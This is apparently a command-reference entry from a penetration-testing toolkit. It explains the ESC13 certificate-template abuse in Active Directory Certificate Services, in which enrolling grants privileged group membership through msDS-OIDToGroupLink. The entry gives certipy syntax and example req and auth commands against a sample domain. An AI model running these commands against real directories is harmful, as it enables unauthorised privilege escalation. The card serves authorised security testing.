Certipy ESC13 (OID Group Link)

ESC13: a template's issuance policy is linked to a privileged group via msDS-OIDToGroupLink. Enrolling adds the linked group SID to the resulting Kerberos ticket — instant group membership without ever touching the group object.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP, KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy req -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca-name>' -template '<template>'

Examples

certipy req -u jdoe@corp.local -p Pass -dc-ip 10.10.10.10 -ca CORP-CA -template ESC13Template
certipy auth -pfx jdoe.pfx -domain corp.local

Tags

certipy adcs esc13 oid group-link

References